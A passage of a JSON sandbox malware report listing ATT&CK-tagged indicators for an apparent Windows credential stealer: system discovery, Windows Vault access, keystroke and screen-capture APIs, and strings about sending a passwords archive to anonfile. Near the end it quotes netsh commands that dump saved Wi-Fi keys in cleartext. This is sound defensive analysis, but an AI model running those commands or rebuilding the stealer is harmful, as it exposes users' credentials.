"identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"IsWow64Process\" with parameter \"1916\" - (UID: 00000000-00001916)\n \"577.exe\" called \"IsWow64Process\" with parameter \"5100\" - (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00001916)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"577.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-148", "relevance": 1, "name": "Contains ability to get active window titles (Dotnet)", "description": "Observed Namespace \"System.Diagnostics.Process\" and MemberReference \"get_MainWindowTitle\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"577.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"577.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\577.exe\" at 00000000-00005100-0000010C-3719119", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-137", "relevance": 1, "name": "Contains ability to retrieve network adapter information (Dotnet)", "description": "Observed namespace \"System.Net.NetworkInformation\" and TypeReference \"NetworkInterface\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-119", "relevance": 1, "name": "Contains ability to gather system environment details", "description": "Observed function \"GetEnvironmentVariable\" in \"577.exe\"\n Observed function \"ExpandEnvironmentVariables\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-152", "relevance": 1, "name": "Contains ability to retrieve current user details (Dotnet)", "description": "Observed Namespace \"System.Security.Principal.WindowsIdentity\" and MemberReference \"GetCurrent\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000d0884b00d0f84100145c4377435c43779cf9410001000000940149000100000050f84100935c447740834b77d4a04377de7f15779cf94100010000000100000058d04b000000000020f8410050f84100bcf8410095e13f7776831700feffffffd4a043771bbe3d7500007b7500000000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000072006f0073006f00660074002e004e00450054005c004600720061006d00650077006f0072006b005c00760032002e0030002e00350030003700320037005c006d00730063006f00720077006b0073002e0064006c006c002e0032002e0043006f006e00660069006700000002000002 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000636de96a00003a00000000006c6de96a970465f6d8d73e65ecf23000e8f2300000000000000000000000000000000000d8d73e6540f2300000000000b0f23000ecf2300080f23000ff23e96ac83bf26ac0f230003117e96a080000001c5c427714a14377ffffffff24000000a8f23000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000036003300300064003200360031003200660035003100610062003700380039006400660034003300370063003000360061003600610033003400350061006200330034006400380033003400390038003600650061003500300033006200300037002e00650078006500000002000002 (UID: 00000000-00001916)\n \"577.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000e8864400f4f97800145c4377435c4377c0fa780001000000940142000100000074f97800935c447740834b77d4a04377e3652c77c0fa7800010000000100000070c044000000000044f9780074f97800e0f9780095e13f776f981700feffffffd4a043771bbe3d7500007b7500000000 (UID: 00000000-00005100)\n \"577.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000064004400610074006100000036002d00330032005c0053006300720069007000740073005c003b0043003a005c00550073006500720073005c0048004100500055004200570053005c0041007000700044006100740061005c004c006f00630061006c000800000855ed000040284600 (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"OpenMutexW\" with parameter \"Global\\CLR_CASOFF_MUTEX\" - (UID: 00000000-00001916)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetLocaleInfoW\" with parameter \"1024\" - (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00001916)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"577.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-114", "relevance": 1, "name": "Contains ability to execute WMI queries (Dotnet)", "description": "Observed namespace \"System.Management.ManagementObjectSearcher\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-120", "relevance": 1, "name": "Contains ability to gather system information (Dotnet)", "description": "Observed function \"get_MachineName\" in \"577.exe\"\n Observed function \"get_UserName\" in \"577.exe\"\n Observed function \"get_Is64BitOperatingSystem\" in \"577.exe\"\n Observed function \"get_OSVersion\" in \"577.exe\"\n Observed function \"get_SystemDirectory\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-156", "relevance": 1, "name": "Contains ability to retrieve security identifier details", "description": "Observed Namespace \"System.Security.Principal.SecurityIdentifier\" and MemberReference \".ctor\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"FromBase64String\" (Indicator: \"base64\"; File: \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\")\n Found string \"FromBase64String\" (Indicator: \"FromBase64String\"; File: \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\")\n file/memory contains long string with (Indicator: \"aes\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"aes256\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"base64\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"createdecryptor\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"cryptostream\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"cryptostreammode\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"FromBase64String\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"rijndael\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"Rijndaelmanaged\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"RsaCryptoServiceProvider\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"System.Security.Cryptography\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"zipfile\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"aes\"; File: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp\")\n Found string \"System.Security.Cryptography.X509Certificates\" (Indicator: \"System.Security.Cryptography\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"aes256\" (Indicator: \"aes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"aes256\" (Indicator: \"aes256\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"System.Security.Cryptography\" (Indicator: \"System.Security.Cryptography\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"RSACryptoServiceProvider\" (Indicator: \"RsaCryptoServiceProvider\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ZipFile\" (Indicator: \"zipfile\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"RijndaelManaged\" (Indicator: \"rijndael\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"RijndaelManaged\" (Indicator: \"Rijndaelmanaged\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"CryptoStream\" (Indicator: \"cryptostream\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"CreateDecryptor\" (Indicator: \"createdecryptor\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"CryptoStreamMode\" (Indicator: \"cryptostream\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"CryptoStreamMode\" (Indicator: \"cryptostreammode\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"cAesGcm\" (Indicator: \"aes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"BCRYPT_AES_ALGORITHM\" (Indicator: \"aes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"GZipStream\" (Indicator: \"GzipStream\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"MD5CryptoServiceProvider\" (Indicator: \"md5cryptoserviceprovider\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"Aes256\" (Indicator: \"aes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"Aes256\" (Indicator: \"aes256\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ToBase64String\" (Indicator: \"base64\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ToBase64String\" (Indicator: \"ToBase64String\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"AesCryptoServiceProvider\" (Indicator: \"aes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"AesCryptoServiceProvider\" (Indicator: \"aescryptoserviceprovider\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"CreateEncryptor\" (Indicator: \"createencryptor\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n file/memory contains long string with (Indicator: \"aes\"; Source: \"00000000-00001916.00000000.130655.02DF0000.00000004.mdmp, 00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n file/memory contains long string with (Indicator: \"aes\"; Source: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp\")\n Found string \"FromBase64String\" (Indicator: \"base64\"; Source: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp, 00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"FromBase64String\" (Indicator: \"FromBase64String\"; Source: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp, 00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"aestro Card\" (Indicator: \"aes\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.X509Certificates\" (Indicator: \"System.Security.Cryptography\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-475", "type": 2, "relevance": 1, "name": "Contains string like password/secret", "description": "Found string \"password\" (Indicator: \"password\"; File: \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\")\n Found string \"passwordVaultPtr\" (Indicator: \"password\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"er password:\" (Indicator: \"password\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"passwords archive to anonfile\" (Indicator: \"password\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"eEmail=\"false\" passwordFormat=\"Hashed\" maxInvalidPasswordAttempts=\"5\" minRequi\" (Indicator: \"password\"; Source: \"00000000-00001916.00000000.130655.00490000.00000004.mdmp, 00000000-00001916.00000001.131430.00490000.00000004.mdmp\")\n Found string \"swordLength=\"7\" minRequiredNonalphanumericCharacters=\"1\" passwordAttemptWindow\" (Indicator: \"password\"; Source: \"00000000-00001916.00000000.130655.00490000.00000004.mdmp, 00000000-00001916.00000001.131430.00490000.00000004.mdmp\")\n Found string \"passwordStrengthRegularExpression=\"\"/>\" (Indicator: \"password\"; Source: \"00000000-00001916.00000000.130655.00490000.00000004.mdmp, 00000000-00001916.00000001.131430.00490000.00000004.mdmp\")\n Found string \"password\" (Indicator: \"password\"; Source: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp\")\n Found string \"unning passwords recovery...\" (Indicator: \"password\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"Remember password:\" (Indicator: \"password\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"*Archive password is*: \"_\" (Indicator: \"password\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\"), Found string \"ending passwords archive to anonfile\" (Indicator: \"password\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\"), Found string \"passwordVaultPtr\" (Indicator: \"password\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\"), Found string \"passwordFormat=\"Hashed\"\" (Indicator: \"password\"; Source: \"00000000-00005100.00000000.131007.00420000.00000004.mdmp\"), Found string \"passwordAttemptWindow=\"10\"\" (Indicator: \"password\"; Source: \"00000000-00005100.00000000.131007.00420000.00000004.mdmp\"), Found string \"passwordStrengthRegularExpression=\"\" />\" (Indicator: \"password\"; Source: \"00000000-00005100.00000000.131007.00420000.00000004.mdmp\"), Found string \"passwordFormat\" (Indicator: \"password\"; Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\"), Found string \"passwordAttemptWindow\" (Indicator: \"password\"; Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\"), Found string \"passwordStrengthRegularExpression\" (Indicator: \"password\"; Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\"), Found string \"unning passwords recovery...\" (Indicator: \"password\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\"), Found string \"Remember password:\" (Indicator: \"password\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\"), Found string \"*Archive password is*: \"_\" (Indicator: \"password\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ending passwords archive to anonfile\" (Indicator: \"password\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"passwordVaultPtr\" (Indicator: \"password\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"CopyFromScreen\" (Indicator: \"CopyFromScreen\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"CopyFromScreen\" (Indicator: \"CopyFromScreen\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"CopyFromScreen\" (Indicator: \"CopyFromScreen\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"ProcessList\" (Indicator: \"ProcessList\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetProcessesByName\" (Indicator: \"GetProcessesByName\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetProcessById\" (Indicator: \"GetProcessById\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"ProcessList\" (Indicator: \"ProcessList\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetProcessesByName\" (Indicator: \"GetProcessesByName\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetProcessById\" (Indicator: \"GetProcessById\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"ProcessList\" (Indicator: \"ProcessList\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetProcessesByName\" (Indicator: \"GetProcessesByName\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetProcessById\" (Indicator: \"GetProcessById\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-88", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about pressed keystrokes (API string)", "description": "Found reference to API \"GetKeyState\" (Indicator: \"GetKeyState\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetKeyboardState\" (Indicator: \"GetKeyboardState\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"MapVirtualKey\" (Indicator: \"MapVirtualKey\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetKeyState\" (Indicator: \"GetKeyState\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetKeyboardState\" (Indicator: \"GetKeyboardState\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"MapVirtualKey\" (Indicator: \"MapVirtualKey\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetKeyState\" (Indicator: \"GetKeyState\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetKeyboardState\" (Indicator: \"GetKeyboardState\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"MapVirtualKey\" (Indicator: \"MapVirtualKey\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetTempFileName\" (Indicator: \"GetTempFileName\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetTempFileName\" (Indicator: \"GetTempFileName\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetTempFileName\" (Indicator: \"GetTempFileName\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-217", "type": 2, "relevance": 1, "name": "Contains ability to retrieve user privileges (API string)", "description": "Found reference to API \"IsInRole\" (Indicator: \"IsInRole\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"IsInRole\" (Indicator: \"IsInRole\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"IsInRole\" (Indicator: \"IsInRole\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-627", "type": 2, "relevance": 1, "name": "Able to access Windows Vault", "description": "Found string \"VaultOpenVault\" (Indicator: \"VaultOpenVault\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VaultCloseVault\" (Indicator: \"VaultCloseVault\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VaultFree\" (Indicator: \"VaultFree\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VaultEnumerateVaults\" (Indicator: \"VaultEnumerateVaults\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VaultEnumerateItems\" (Indicator: \"VaultEnumerateItems\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VaultGetItem_WIN8\" (Indicator: \"VaultGetItem_WIN8\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VaultGetItem_WIN8\" (Indicator: \"VaultGetItem\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VaultGetItem\" (Indicator: \"VaultGetItem\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VaultGetItem_WIN7\" (Indicator: \"VaultGetItem_WIN7\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VaultGetItem_WIN7\" (Indicator: \"VaultGetItem\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VAULT_ELEMENT_TYPE\" (Indicator: \"VAULT_ELEMENT_TYPE\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VAULT_SCHEMA_ELEMENT_ID\" (Indicator: \"VAULT_SCHEMA_ELEMENT_ID\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VAULT_ITEM_WIN8\" (Indicator: \"VAULT_ITEM_WIN8\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VAULT_ITEM_WIN7\" (Indicator: \"VAULT_ITEM_WIN7\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"VAULT_ITEM_ELEMENT\" (Indicator: \"VAULT_ITEM_ELEMENT\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1555.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/004"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-334", "type": 2, "relevance": 1, "name": "Contains ability to search for patterns of text (possibly credentials) in files", "description": "Found string \"/C chcp 65001 && netsh wlan show profile | findstr All\" (Indicator: \"findstr \"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"=clear | findstr Key\" (Indicator: \"findstr \"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"C chcp 65001 && netsh wlan show profile | findstr All\" (Indicator: \"findstr \"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"key=clear | findstr Key\" (Indicator: \"findstr \"; Source: 